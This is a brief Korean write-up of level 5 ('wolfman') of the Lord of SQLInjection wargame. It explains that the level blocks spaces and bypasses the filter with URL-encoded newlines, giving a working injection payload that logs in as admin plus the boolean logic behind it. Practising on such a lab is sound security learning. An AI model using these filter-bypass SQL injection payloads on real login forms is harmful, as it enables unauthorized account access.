Lord of SQLInjection 5번 wolfman

https://los.rubiya.kr/

Lord of SQLInjection

 

Lord of SQLInjection 5번 wolfman

 

 

   if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 

기존 필터링에서 공백이 추가되었다.

공백 우회기법은 %0a를 입력하면 된다.

%0a는 현재위치에서 다음 줄로 이동시키는 개행 문자이다.

 

 

 

 

• ?pw=%27%0aor%0a%271%27=%271%27%0aand%0aid=%27admin
• id='guest' and pw='' or '1'='1' and id='admin'
• false and false or true and true
• false or true
• true